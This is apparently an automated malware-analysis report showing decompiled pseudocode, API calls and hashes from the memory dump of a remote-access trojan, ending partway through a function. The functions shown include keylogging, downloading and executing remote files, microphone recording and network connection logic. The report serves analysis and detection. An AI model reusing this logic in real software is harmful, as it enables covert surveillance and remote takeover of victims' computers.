                      0x00000000
                      0x00000000
                      0x00000000
                      0x00789e34
                      0x00789e36
                      0x00789e38
                      0x00789e38
                      0x00000000
                      0x00789e38
                      0x00789de9
                      0x00789df1
                      0x00000000
                      0x00000000
                      0x00789df3
                      0x00789df6
                      0x00789dfc
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00789dfc
                      0x00789e02
                      0x00789e04
                      0x00789e04
                      0x00000000

                      APIs
                      • GetACP.KERNEL32(?,20001004,?,00000002,00000000,00000050,00000050,?,0078A012,?,00000050,?,?,?,?,?), ref: 00789E92
                      Strings
                      Memory Dump Source
                      • Source File: 0000001C.00000002.416250521.0000000000740000.00000040.00000001.sdmp, Offset: 00740000, based on PE: true
• Associated: 0000001C.00000002.416426538.00000000007AF000.00000040.00000001.sdmp
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID: ACP$OCP
                      • API String ID: 0-711371036
                      • Opcode ID: 2b13f8d16163febee5bcd893e0e0c64a2b899469d4a669ddd9a73942caf6484d
                      • Instruction ID: dc007e419f3ca9a9d01004f616dd88af5690240e263987f1d1f0ac383ccd4c98
                      • Opcode Fuzzy Hash: 2b13f8d16163febee5bcd893e0e0c64a2b899469d4a669ddd9a73942caf6484d
                      • Instruction Fuzzy Hash: 40218663A80104A6DB34EE65C941BB7B69AABA4F51F5E4424EB09D7204E73ADD41C390
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 60%
                      			E00744A08(void* __edx, char _a4) {
                      				void* __ebx;
                      				void* __ecx;
                      				void* __edi;
                      				void* __esi;
                      				void* _t12;
                      				signed int _t15;
                      				void* _t16;
                      				void* _t22;
                      				void* _t23;
                      				signed int _t25;
                      				void* _t31;
                      				char* _t32;
                      				void* _t33;
                      
                      				_t22 = _t23;
                      				_t32 =  &_a4;
                      				_t2 = _t22 + 8; // 0x7adba0
                      				_t12 = _t2;
                      				_t31 = _t12;
                      				asm("movsd");
                      				asm("movsd");
                      				asm("movsd");
                      				asm("movsd");
                      				__imp__#4( *((intOrPtr*)(_t22 + 4)), _t12, 0x10);
                      				if(_t12 != 0) {
                      					L5:
                      					return 0;
                      				}
                      				if( *((intOrPtr*)(_t22 + 1)) == _t12) {
                      					L9:
                      					return 1;
                      				}
                      				_t15 = E0075C71E(_t22, _t23);
                      				 *(_t22 + 0x44) = _t15;
                      				if(_t15 == 0) {
                      					goto L5;
                      				}
                      				_t30 =  *((intOrPtr*)(_t22 + 4));
                      				_t16 = E0075C76C(_t15,  *((intOrPtr*)(_t22 + 4)));
                      				_t25 =  *(_t22 + 0x44);
                      				if(_t16 == 1) {
                      					if(E0075D1ED() == 1) {
                      						goto L9;
                      					}
                      					_t34 = _t33 - 0x18;
                      					E00742084(_t22, _t33 - 0x18, "TLS Authentication failed");
                      					E00742084(_t22, _t34 - 0x18, "[ERROR]");
                      					_t16 = E0075C8E7(E00756C80(_t22, _t31),  *(_t22 + 0x44));
                      					_t25 =  *(_t22 + 0x44);
                      				}
                      				E0075C763(_t16, _t22, _t25, _t30, _t31, _t32);
                      				 *(_t22 + 0x44) =  *(_t22 + 0x44) & 0x00000000;
                      				goto L5;
                      			}

                      0x00744a0f
                      0x00744a11
                      0x00744a16
                      0x00744a16
                      0x00744a19
                      0x00744a1f
                      0x00744a20
                      0x00744a21
                      0x00744a22
                      0x00744a23
                      0x00744a2b
                      0x00744a59
                      0x00000000
                      0x00744a59
                      0x00744a30
                      0x00744aa0
                      0x00000000
                      0x00744aa0
                      0x00744a32
                      0x00744a37
                      0x00744a3c
                      0x00000000
                      0x00000000
                      0x00744a3e
                      0x00744a43
                      0x00744a48
                      0x00744a4e
                      0x00744a6b
                      0x00000000
                      0x00000000
                      0x00744a6d
                      0x00744a77
                      0x00744a86
                      0x00744a96
                      0x00744a9b
                      0x00744a9b
                      0x00744a50
                      0x00744a55
                      0x00000000

                      APIs
                      • connect.WS2_32(?,007ADBA0,00000010), ref: 00744A23
                      Strings
                      Memory Dump Source
                      • Source File: 0000001C.00000002.416250521.0000000000740000.00000040.00000001.sdmp, Offset: 00740000, based on PE: true
• Associated: 0000001C.00000002.416426538.00000000007AF000.00000040.00000001.sdmp
                      Yara matches
                      Similarity
                      • API ID: connect
                      • String ID: TLS Authentication failed$[ERROR]
                      • API String ID: 1959786783-1964023390
                      • Opcode ID: a64c0a8e08398c3f8e54caa36e5b8918451c4d6b82b62b9e58e85cf64dd5314f
                      • Instruction ID: 5cab2ae66813a3e5bbaae04889ede54a90dc0af5c6a191ffd5fe60ded56689c4
                      • Opcode Fuzzy Hash: a64c0a8e08398c3f8e54caa36e5b8918451c4d6b82b62b9e58e85cf64dd5314f
                      • Instruction Fuzzy Hash: 23012631340200DBDF19BFA4998ABBA3B59DF41351B48805AFD058F247EFAADC04D7A2
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 87%
                      			E00752A86(void* __ebx, void* __edx, void* __ebp, char _a8, char _a12, char _a16, char _a28, void* _a108, void* _a132) {
                      				char _v4;
                      				intOrPtr* _t12;
                      				void* _t14;
                      				void* _t18;
                      				void* _t27;
                      				void* _t44;
                      				void* _t51;
                      				void* _t55;
                      
                      				L0:
                      				_t44 = __edx;
                      				_t27 = __ebx;
                      				Sleep(0x64);
                      				_t55 =  *0x7abd6c - _t27; // 0x0
                      				if(_t55 != 0) {
                      					goto L0;
                      				}
                      				_t12 = E00741F95(E00741E49( &_a16, _t44, _t55, 0));
                      				_t14 = E00741F95(E00741E49( &_a12, _t44, _t55, 1));
                      				_t45 =  *_t12;
                      				E0075805B( &_a28,  *_t12, _t14);
                      				_t18 = E00741F95(E00741E49( &_a8,  *_t12, _t55, 2));
                      				__imp__URLDownloadToFileW(0, _t18, E00741EEB( &_a28), 0, 0);
                      				_t56 = _t18;
                      				if(_t18 == 0) {
                      					E00747350(0, _t51 - 0x18, _t45, _t56,  &_a16);
                      					E0074B0E2();
                      				}
                      				E00741EF0();
                      				_t8 =  &_v4; // 0x744538
                      				E00741E74(_t8, _t45);
                      				E00741FC7();
                      				E00741FC7();
                      				return 0;
                      			}

                      0x00752a86
                      0x00752a86
                      0x00752a86
                      0x00752a88
                      0x00752a8e
                      0x00752a94
                      0x00000000
                      0x00000000
                      0x00752aa4
                      0x00752ab8
                      0x00752abd
                      0x00752ac4
                      0x00752ae3
                      0x00752aea
                      0x00752af0
                      0x00752af2
                      0x00752b02
                      0x00752b07
                      0x00752b0c
                      0x0075318d
                      0x007533c4
                      0x007533c8
                      0x007533d4
                      0x007533e0
                      0x007533ed

                      APIs
                      • Sleep.KERNEL32(00000064), ref: 00752A88
                      • URLDownloadToFileW.URLMON(00000000,00000000,00000002,00000000,00000000), ref: 00752AEA
                      Strings
                      Memory Dump Source
                      • Source File: 0000001C.00000002.416250521.0000000000740000.00000040.00000001.sdmp, Offset: 00740000, based on PE: true
• Associated: 0000001C.00000002.416426538.00000000007AF000.00000040.00000001.sdmp
                      Yara matches
                      Similarity
                      • API ID: DownloadFileSleep
                      • String ID: 8Et
                      • API String ID: 1931167962-257909599
                      • Opcode ID: 0dcfbfaa70a0850b8b419783966203b8537dc991a1fffd920b3b3c5ffde45ee8
                      • Instruction ID: 0aac57cd42921f254ed1fc7df434769947ad75d04a28cd22add04469feaeabf9
                      • Opcode Fuzzy Hash: 0dcfbfaa70a0850b8b419783966203b8537dc991a1fffd920b3b3c5ffde45ee8
                      • Instruction Fuzzy Hash: AE119471508300DBD714FBB1D85A9BEB3A8AF55301F804D2EF94696092FF7C9A4DC652
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 81%
                      			E007495A9(void* __ebx, struct HHOOK__** __ecx) {
                      				char _v28;
                      				void* __edi;
                      				struct HHOOK__** _t27;
                      				void* _t28;
                      
                      				_t17 = __ebx;
                      				_t27 = __ecx;
                      				if( *((char*)(__ecx + 0x49)) == 0) {
                      					__eflags = 0;
                      					return 0;
                      				}
                      				_t33 =  *0x7aa9d4 - 0x32;
                      				_t26 = "Offline Keylogger Stopped";
                      				if( *0x7aa9d4 != 0x32) {
                      					E00742084(__ebx,  &_v28, "Offline Keylogger Stopped");
                      					_t28 = _t28 - 0x18;
                      					E007572DA(_t28,  &_v28);
                      					E00749634(__ebx, _t27, _t33);
                      					E00741FC7();
                      				}
                      				_t29 = _t28 - 0x18;
                      				E00742084(_t17, _t28 - 0x18, _t26);
                      				E00742084(_t17, _t29 - 0x18, "[Info]");
                      				E00756C80(_t17, _t26);
                      				_t27[0x12] = 0;
                      				if(_t27[0x12] == 0 &&  *_t27 != 0) {
                      					UnhookWindowsHookEx( *_t27);
                      					 *_t27 =  *_t27 & 0x00000000;
                      				}
                      				return 1;
                      			}

                      0x007495a9
                      0x007495b0
                      0x007495b7
                      0x0074962c
                      0x00000000
                      0x0074962c
                      0x007495b9
                      0x007495c0
                      0x007495c5
                      0x007495cb
                      0x007495d0
                      0x007495d8
                      0x007495df
                      0x007495e7
                      0x007495e7
                      0x007495ec
                      0x007495f2
                      0x00749601
                      0x00749606
                      0x0074960e
                      0x00749616
                      0x0074961f
                      0x00749625
                      0x00749625
                      0x00000000

                      APIs
                      • UnhookWindowsHookEx.USER32(?), ref: 0074961F
                        • Part of subcall function 00749634: GetLocalTime.KERNEL32(?,Offline Keylogger Started,007AC350), ref: 00749642
                        • Part of subcall function 00749634: wsprintfW.USER32 ref: 007496C3
                        • Part of subcall function 00749634: SetEvent.KERNEL32(00000000,00000000), ref: 007496ED
                      Strings
                      Memory Dump Source
                      • Source File: 0000001C.00000002.416250521.0000000000740000.00000040.00000001.sdmp, Offset: 00740000, based on PE: true
• Associated: 0000001C.00000002.416426538.00000000007AF000.00000040.00000001.sdmp
                      Yara matches
                      Similarity
                      • API ID: EventHookLocalTimeUnhookWindowswsprintf
                      • String ID: Offline Keylogger Stopped$[Info]
                      • API String ID: 2949427887-1791908007
                      • Opcode ID: d6ab04963d273036d58e03d4589d23c01d5c3d0ae06afb8d7f8657443ae11659
                      • Instruction ID: 4fc27d8a50774a0f14c8964911817b68e6ce67dad5d1df59acd7f17e59854eb4
                      • Opcode Fuzzy Hash: d6ab04963d273036d58e03d4589d23c01d5c3d0ae06afb8d7f8657443ae11659
                      • Instruction Fuzzy Hash: 4A01B121A0420097DB257768D80F7FF7BE59B42301F84055DEA8512193EFBD195AC7D7
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 29%
                      			E007825B3(void* __ecx, void* __esi, void* __eflags, char _a4) {
                      				signed int _v8;
                      				signed int _t5;
                      				intOrPtr* _t18;
                      				signed int _t20;
                      
                      				_t13 = __ecx;
                      				_push(__ecx);
                      				_t5 =  *0x7aa00c; // 0x67a7e35e
                      				_v8 = _t5 ^ _t20;
                      				_push(__esi);
                      				_t18 = E00781F97(0x15, "IsValidLocaleName", 0x7990e0, "IsValidLocaleName");
                      				if(_t18 == 0) {
                      					_t3 =  &_a4; // 0x77e33f
                      					IsValidLocale(E00782708(_t13, _t18, __eflags,  *_t3, 0), 1);
                      				} else {
                      					_t2 =  &_a4; // 0x77e33f
                      					 *0x793474( *_t2);
                      					 *_t18();
                      				}
                      				return E0076FD1B(_v8 ^ _t20);
                      			}

                      0x007825b3
                      0x007825b8
                      0x007825b9
                      0x007825c0
                      0x007825c3
                      0x007825da
                      0x007825e1
                      0x007825f6
                      0x007825ff
                      0x007825e3
                      0x007825e3
                      0x007825e8
                      0x007825ee
                      0x007825ee
                      0x00782613

                      APIs
                      • IsValidLocale.KERNEL32(00000000,?w,00000000,00000001,?,?,0077E33F,?,?,0077DD1F,?,00000004), ref: 007825FF
                      Strings
                      Memory Dump Source
                      • Source File: 0000001C.00000002.416250521.0000000000740000.00000040.00000001.sdmp, Offset: 00740000, based on PE: true
• Associated: 0000001C.00000002.416426538.00000000007AF000.00000040.00000001.sdmp
                      Yara matches
                      Similarity
                      • API ID: LocaleValid
                      • String ID: ?w$IsValidLocaleName
                      • API String ID: 1901932003-75978879
                      • Opcode ID: 4071c5ad343d4d37357e43ad22eda7c20a3957156d6d0849498b15a1b3b1046a
                      • Instruction ID: 319732f3fe26fbde31f422171778819446143ba6d3f137f87ac1550752fcb485
                      • Opcode Fuzzy Hash: 4071c5ad343d4d37357e43ad22eda7c20a3957156d6d0849498b15a1b3b1046a
                      • Instruction Fuzzy Hash: D9F059307C060CB7DB117B68AC07FAE7B54DB04712F00802AFE0166291DA7D1E029688
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 49%
                      			E00749B11(void* __ebx, void* __ecx) {
                      				void* _t4;
                      				void* _t7;
                      				void* _t10;
                      				signed int _t12;
                      				void* _t13;
                      				void* _t17;
                      				void* _t18;
                      
                      				_t10 = __ebx;
                      				_t17 = __ecx;
                      				_t12 = GetKeyState(0x11) & 0x0000ffff;
                      				_t4 =  *((intOrPtr*)(_t17 + 0x4c)) - 0xa4;
                      				if(_t4 == 0) {
                      					_t13 = _t18 - 0x18;
                      					_push("[AltL]");
                      					L6:
                      					E00742084(_t10, _t13);
                      					return E00748B59(_t17);
                      				}
                      				_t7 = _t4 - 1;
                      				if(_t7 == 0) {
                      					if(_t12 == 0) {
                      						_t13 = _t18 - 0x18;
                      						_push("[AltR]");
                      						goto L6;
                      					}
                      					return _t7;
                      				} else {
                      					E007489BA(_t17, _t18 - 0x18);
                      					return E00748B80(_t17);
                      				}
                      			}
                      0x00749b11
                      0x00749b14
                      0x00749b1c
                      0x00749b22
                      0x00749b27
                      0x00749b56
                      0x00749b58
                      0x00749b5d
                      0x00749b5d
                      0x00000000
                      0x00749b64
                      0x00749b29
                      0x00749b2c
                      0x00749b45
                      0x00749b4a
                      0x00749b4c
                      0x00000000
                      0x00749b4c
                      0x00749b6a
                      0x00749b2e
                      0x00749b34
                      0x00749b41
                      0x00749b41

                      APIs
                      • GetKeyState.USER32(00000011), ref: 00749B16
                        • Part of subcall function 007489BA: GetForegroundWindow.USER32(00000000,?,00000000), ref: 007489EE
                        • Part of subcall function 007489BA: GetWindowThreadProcessId.USER32(00000000,?), ref: 007489F9
                        • Part of subcall function 007489BA: GetKeyboardLayout.USER32 ref: 00748A00
                        • Part of subcall function 007489BA: GetKeyState.USER32(00000010), ref: 00748A0A
                        • Part of subcall function 007489BA: GetKeyboardState.USER32(?), ref: 00748A17
                        • Part of subcall function 007489BA: ToUnicodeEx.USER32(?,?,?,?,00000010,00000000,00000000), ref: 00748A33
                        • Part of subcall function 00748B80: SetEvent.KERNEL32(?,?,?,?,00749CFC,?,?,?,?,?,00000000), ref: 00748BAD
                      Strings
                      Memory Dump Source
                      • Source File: 0000001C.00000002.416250521.0000000000740000.00000040.00000001.sdmp, Offset: 00740000, based on PE: true
                      • Associated: 0000001C.00000002.416426538.00000000007AF000.00000040.00000001.sdmp
                      Yara matches
                      Similarity
                      • API ID: State$KeyboardWindow$EventForegroundLayoutProcessThreadUnicode
                      • String ID: [AltL]$[AltR]
                      • API String ID: 3195419117-2658077756
                      • Opcode ID: 8b113cce0d4b2f176c91a0615d1f492ff9a39933b70228e63569f537435216a7
                      • Instruction ID: 9fe7ee07d5909c65556bf695de8a34ab807b431d773f9fd3e52cd5daca6ccc32
                      • Opcode Fuzzy Hash: 8b113cce0d4b2f176c91a0615d1f492ff9a39933b70228e63569f537435216a7
                      • Instruction Fuzzy Hash: DDE065E1340615AA8958363D792F57E3811CB427707810249F6468B686DF5E4D4183D7
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 100%
                      			E00752777(void* __edx, void* __ebp, void* __eflags, char _a16, void* _a128, void* _a152) {
                      
                      				_t19 = __edx;
                      				ShellExecuteW(0, L"open", E00741F95(E00741E49( &_a16, __edx, __eflags, 0)), 0, 0, 1);
                      				_t2 =  &_a16; // 0x744538
                      				E00741E74(_t2, _t19);
                      				E00741FC7();
                      				E00741FC7();
                      				return 0;
                      			}
                      0x00752777
                      0x00752795
                      0x007533c4
                      0x007533c8
                      0x007533d4
                      0x007533e0
                      0x007533ed

                      APIs
                      • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000000), ref: 00752795
                      Strings
                      Memory Dump Source
                      • Source File: 0000001C.00000002.416250521.0000000000740000.00000040.00000001.sdmp, Offset: 00740000, based on PE: true
                      • Associated: 0000001C.00000002.416426538.00000000007AF000.00000040.00000001.sdmp
                      Yara matches
                      Similarity
                      • API ID: ExecuteShell
                      • String ID: 8Et$open
                      • API String ID: 587946157-83843028
                      • Opcode ID: 829f9e020b4fb9afe4b7787cb725b7b9144581f19737eaba14af78e044f1ec72
                      • Instruction ID: e907d504416738f0a0bea1024e9585ce4a57bafbf23c5a8083b315a9cf8fca42
                      • Opcode Fuzzy Hash: 829f9e020b4fb9afe4b7787cb725b7b9144581f19737eaba14af78e044f1ec72
                      • Instruction Fuzzy Hash: DFE092722083049BD304FAB0EC89EBFB398AB52301F80082EF50A81092EF285D4DC221
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 43%
                      			E00749B6B(void* __ebx, void* __ecx) {
                      				void* _t4;
                      				void* _t7;
                      				signed int _t9;
                      				void* _t10;
                      				void* _t12;
                      				void* _t13;
                      
                      				_t7 = __ebx;
                      				_t12 = __ecx;
                      				_t9 = GetKeyState(0x12) & 0x0000ffff;
                      				_t4 =  *((intOrPtr*)(_t12 + 0x4c)) - 0xa2;
                      				if(_t4 == 0) {
                      					if(_t9 == 0) {
                      						_t10 = _t13 - 0x18;
                      						_push("[CtrlL]");
                      						goto L5;
                      					}
                      				} else {
                      					_t4 = _t4 - 1;
                      					if(_t4 == 0) {
                      						_t10 = _t13 - 0x18;
                      						_push("[CtrlR]");
                      						L5:
                      						E00742084(_t7, _t10);
                      						return E00748B59(_t12);
                      					}
                      				}
                      				return _t4;
                      			}
                      0x00749b6b
                      0x00749b6e
                      0x00749b76
                      0x00749b7c
                      0x00749b81
                      0x00749b97
                      0x00749b9c
                      0x00749b9e
                      0x00000000
                      0x00749b9e
                      0x00749b83
                      0x00749b83
                      0x00749b86
                      0x00749b8b
                      0x00749b8d
                      0x00749ba3
                      0x00749ba3
                      0x00000000
                      0x00749baa
                      0x00749b86
                      0x00749bb0

                      APIs
                      • GetKeyState.USER32(00000012), ref: 00749B70
                      Strings
                      Memory Dump Source
                      • Source File: 0000001C.00000002.416250521.0000000000740000.00000040.00000001.sdmp, Offset: 00740000, based on PE: true
                      • Associated: 0000001C.00000002.416426538.00000000007AF000.00000040.00000001.sdmp
                      Yara matches
                      Similarity
                      • API ID: State
                      • String ID: [CtrlL]$[CtrlR]
                      • API String ID: 1649606143-2446555240
                      • Opcode ID: 5a8632a9a88b85623d07354fe012321e584fd2a76855a31a9ef05d6c66971103
                      • Instruction ID: fc1c52bee54d93710067e8000b7364fb9e22c13c45bc990c48c16a9d14295a1a
                      • Opcode Fuzzy Hash: 5a8632a9a88b85623d07354fe012321e584fd2a76855a31a9ef05d6c66971103
                      • Instruction Fuzzy Hash: 45E086E13602205BC9153A3DF92A67E3910CB42770F80011AF686DB585CF4F4D1183C2
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 68%
                      			E007529DA(void* __eax, void* __ebp, void* __eflags, char _a12, void* _a124, void* _a148) {
                      				void* _t16;
                      
                      				 *0x7aba74 = 1;
                      				waveInStop(??);
                      				waveInClose( *0x7abab8);
                      				_t1 =  &_a12; // 0x744538
                      				E00741E74(_t1, _t16);
                      				E00741FC7();
                      				E00741FC7();
                      				return 0;
                      			}
                      0x007529df
                      0x007529e6
                      0x007529f2
                      0x007533c4
                      0x007533c8
                      0x007533d4
                      0x007533e0
                      0x007533ed

                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 0000001C.00000002.416250521.0000000000740000.00000040.00000001.sdmp, Offset: 00740000, based on PE: true
                      • Associated: 0000001C.00000002.416426538.00000000007AF000.00000040.00000001.sdmp
                      Yara matches
                      Similarity
                      • API ID: wave$CloseStop
                      • String ID: 8Et
                      • API String ID: 3638528417-257909599
                      • Opcode ID: 0cbfe65a57c40cdbc52baa9e169b384b9c74032c4062a91e4a6465e6502ae7c0
                      • Instruction ID: 9c08d16f517b0a92474224b75678f934f5b550aa7b20486caa70e1c5f5b61c7f
                      • Opcode Fuzzy Hash: 0cbfe65a57c40cdbc52baa9e169b384b9c74032c4062a91e4a6465e6502ae7c0
                      • Instruction Fuzzy Hash: AFE08631109140CBD310FB24EC096DDBBA0FB93301F808929E459C10B2DF39099ED755
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 100%
                      			E0077ABB8(void* __edx, short* _a4, char* _a8, int _a12, intOrPtr _a16) {
                      				char* _v8;
                      				int _v12;
                      				char _v16;
                      				char _v24;
                      				char _v28;
                      				void* __ebx;
                      				char _t34;
                      				int _t35;
                      				int _t38;
                      				long _t39;
                      				char* _t42;
                      				int _t44;
                      				int _t47;
                      				int _t53;
                      				intOrPtr _t55;
                      				void* _t56;
                      				char* _t57;
                      				char* _t62;
                      				char* _t63;
                      				void* _t64;
                      				int _t65;
                      				short* _t67;
                      				short* _t68;
                      				int _t69;
                      				intOrPtr* _t70;
                      
                      				_t64 = __edx;
                      				_t53 = _a12;
                      				_t67 = _a4;
                      				_t68 = 0;
                      				if(_t67 == 0) {
                      					L3:
                      					if(_a8 != _t68) {
                      						E00775507(_t53,  &_v28, _t64, _a16);
                      						_t34 = _v24;
                      						__eflags = _t67;
                      						if(_t67 == 0) {
                      							__eflags =  *((intOrPtr*)(_t34 + 0xa8)) - _t68;
                      							if( *((intOrPtr*)(_t34 + 0xa8)) != _t68) {
                      								_t69 = _t68 | 0xffffffff;
                      								_t35 = MultiByteToWideChar( *(_t34 + 8), 9, _a8, _t69, _t68, _t68);
                      								__eflags = _t35;
                      								if(_t35 != 0) {
                      									L29:
                      									_t28 = _t35 - 1; // -1
                      									_t69 = _t28;
                      									L30:
                      									__eflags = _v16;
                      									if(_v16 != 0) {
                      										_t55 = _v28;
                      										_t31 = _t55 + 0x350;
                      										 *_t31 =  *(_t55 + 0x350) & 0xfffffffd;
                      										__eflags =  *_t31;
                      									}
                      									return _t69;
                      								}
                      								 *((intOrPtr*)(E0077A504())) = 0x2a;
                      								goto L30;
                      							}
                      							_t70 = _a8;
                      							_t56 = _t70 + 1;
                      							do {
                      								_t38 =  *_t70;
                      								_t70 = _t70 + 1;
                      								__eflags = _t38;
                      							} while (_t38 != 0);
                      							_t69 = _t70 - _t56;
                      							goto L30;
                      						}
                      						__eflags =  *((intOrPtr*)(_t34 + 0xa8)) - _t68;
                      						if( *((intOrPtr*)(_t34 + 0xa8)) != _t68) {
                      							_t69 = _t68 | 0xffffffff;
                      							_t35 = MultiByteToWideChar( *(_t34 + 8), 9, _a8, _t69, _t67, _t53);
                      							__eflags = _t35;
                      							if(_t35 != 0) {
                      								goto L29;
                      							}
                      							_t39 = GetLastError();
                      							__eflags = _t39 - 0x7a;
                      							if(_t39 != 0x7a) {
                      								L21:
                      								 *((intOrPtr*)(E0077A504())) = 0x2a;
                      								 *_t67 = 0;
                      								goto L30;
                      							}
                      							_t42 = _a8;
                      							_t57 = _t42;
                      							_v8 = _t57;
                      							_t65 = _t53;
                      							__eflags = _t53;
                      							if(_t53 == 0) {
                      								L20:
                      								_t44 = MultiByteToWideChar( *(_v24 + 8), 1, _t42, _t57 - _t42, _t67, _t53);
                      								__eflags = _t44;
                      								if(_t44 != 0) {
                      									_t69 = _t44;
                      									goto L30;
                      								}
                      								goto L21;
                      							} else {
                      								goto L15;
                      							}
                      							while(1) {
                      								L15:
                      								_t45 =  *_t57;
                      								_v12 = _t65 - 1;
                      								__eflags =  *_t57;
                      								if(__eflags == 0) {
                      									break;
                      								}
                      								_t47 = E007845B6(__eflags, _t45 & 0x000000ff,  &_v24);
                      								_t62 = _v8;
                      								__eflags = _t47;
                      								if(_t47 == 0) {
                      									L18:
                      									_t65 = _v12;
                      									_t57 = _t62 + 1;
                      									_v8 = _t57;
                      									__eflags = _t65;
                      									if(_t65 != 0) {
                      										continue;
                      									}
                      									break;
                      								}
                      								_t62 = _t62 + 1;
                      								__eflags =  *_t62;
                      								if( *_t62 == 0) {
                      									goto L21;
                      								}
                      								goto L18;
                      							}
                      							_t42 = _a8;
                      							goto L20;
                      						}
                      						__eflags = _t53;
                      						if(_t53 == 0) {
                      							goto L30;
                      						}
                      						_t63 = _a8;
                      						while(1) {
                      							 *_t67 =  *(_t68 + _t63) & 0x000000ff;
                      							__eflags =  *(_t68 + _t63);
                      							if( *(_t68 + _t63) == 0) {
                      								goto L30;
                      							}
                      							_t68 =  &(_t68[0]);
                      							_t67 =  &(_t67[1]);
                      							__eflags = _t68 - _t53;
                      							if(_t68 < _t53) {
                      								continue;
                      							}
                      							goto L30;
                      						}
                      						goto L30;
                      					}
                      					 *((intOrPtr*)(E0077A504())) = 0x16;
                      					return E0077695D() | 0xffffffff;
                      				}
                      				if(_t53 != 0) {
                      					 *_t67 = 0;
                      					goto L3;
                      				}
                      				return 0;
                      			}
                      0x0077abb8
                      0x0077abc1
                      0x0077abc6
                      0x0077abc9
                      0x0077abcd
                      0x0077abdc
                      0x0077abdf
                      0x0077abff
                      0x0077ac04
                      0x0077ac07
                      0x0077ac09
                      0x0077acd7
                      0x0077acdd
                      0x0077acf2
                      0x0077acfe
                      0x0077ad04
                      0x0077ad06
                      0x0077ad15
                      0x0077ad15
                      0x0077ad15
                      0x0077ad18
                      0x0077ad18
                      0x0077ad1c
                      0x0077ad1e
                      0x0077ad21
                      0x0077ad21
                      0x0077ad21
                      0x0077ad21
                      0x00000000
                      0x0077ad28
                      0x0077ad0d
                      0x00000000
                      0x0077ad0d
                      0x0077acdf
                      0x0077ace2
                      0x0077ace5
                      0x0077ace5
                      0x0077ace7
                      0x0077ace8
                      0x0077ace8
                      0x0077acec
                      0x00000000
                      0x0077acec
                      0x0077ac0f
                      0x0077ac15
                      0x0077ac42
                      0x0077ac4e
                      0x0077ac54
                      0x0077ac56
                      0x00000000
                      0x00000000
                      0x0077ac5c
                      0x0077ac62
                      0x0077ac65
                      0x0077acc1
                      0x0077acc6
                      0x0077acce
                      0x00000000
                      0x0077acce
                      0x0077ac67
                      0x0077ac6a
                      0x0077ac6c
                      0x0077ac6f
                      0x0077ac71
                      0x0077ac73
                      0x0077aca9
                      0x0077acb7
                      0x0077acbd
                      0x0077acbf
                      0x0077acd3
                      0x00000000
                      0x0077acd3
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00000000
                      0x0077ac75
                      0x0077ac75
                      0x0077ac75
                      0x0077ac78
                      0x0077ac7b
                      0x0077ac7d
                      0x00000000
                      0x00000000
                      0x0077ac87
                      0x0077ac8e
                      0x0077ac91
                      0x0077ac93
                      0x0077ac9b
                      0x0077ac9b
                      0x0077ac9e
                      0x0077ac9f
                      0x0077aca2
                      0x0077aca4
                      0x00000000
                      0x00000000
                      0x00000000
                      0x0077aca4
                      0x0077ac95
                      0x0077ac96
                      0x0077ac99
                      0x00000000
                      0x00000000
                      0x00000000
                      0x0077ac99
                      0x0077aca6
                      0x00000000
                      0x0077aca6
                      0x0077ac17
                      0x0077ac19
                      0x00000000
                      0x00000000
                      0x0077ac1f
                      0x0077ac22
                      0x0077ac26
                      0x0077ac29
                      0x0077ac2d
                      0x00000000
                      0x00000000
                      0x0077ac33
                      0x0077ac34
                      0x0077ac37
                      0x0077ac39
                      0x00000000
                      0x00000000
                      0x00000000
                      0x0077ac3b
                      0x00000000
                      0x0077ac22
                      0x0077abe6
                      0x00000000
                      0x0077abf1
                      0x0077abd3
                      0x0077abd9
                      0x00000000
                      0x0077abd9
                      0x0077ad30

                      APIs
                      • MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,00741D39), ref: 0077AC4E
                      • GetLastError.KERNEL32 ref: 0077AC5C
                      • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0077ACB7
                      Memory Dump Source
                      • Source File: 0000001C.00000002.416250521.0000000000740000.00000040.00000001.sdmp, Offset: 00740000, based on PE: true
                      • Associated: 0000001C.00000002.416426538.00000000007AF000.00000040.00000001.sdmp
                      Yara matches
                      Similarity
                      • API ID: ByteCharMultiWide$ErrorLast
                      • String ID:
                      • API String ID: 1717984340-0
                      • Opcode ID: 6fafbf0848c301fc506a797e3137deebf8a68d1f9bc7f9f27ccb7538f4eac0db
                      • Instruction ID: 2a9ff300e24ddc23b1b4fc2b96d380aa3789a0bb4113996121351aefea0e5b05
                      • Opcode Fuzzy Hash: 6fafbf0848c301fc506a797e3137deebf8a68d1f9bc7f9f27ccb7538f4eac0db
                      • Instruction Fuzzy Hash: D941C630600246BFEF228F64C844A6E7BA5EF81391F25C569E95D5B2A5E7388D01CB62
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 55%
                      			E0074F4FE(intOrPtr* __ecx) {
                      				intOrPtr _v8;
                      				intOrPtr _v12;
                      				intOrPtr* _v16;
                      				signed short* _v20;
                      				intOrPtr _t41;
                      				intOrPtr _t44;
                      				intOrPtr _t46;
                      				signed short _t57;
                      				signed int _t58;
                      				intOrPtr _t59;
                      				intOrPtr* _t60;
                      				void* _t64;
                      				void* _t66;
                      				intOrPtr _t68;
                      				intOrPtr _t76;
                      				intOrPtr* _t79;
                      				intOrPtr _t80;
                      				void _t81;
                      				signed short* _t82;
                      				void* _t87;
                      				intOrPtr* _t88;
                      				void* _t89;
                      
                      				_t88 = __ecx;
                      				_t87 = 1;
                      				_t41 =  *__ecx;
                      				_t68 =  *((intOrPtr*)(__ecx + 4));
                      				_v12 = _t68;
                      				if( *((intOrPtr*)(_t41 + 0x84)) != 0) {
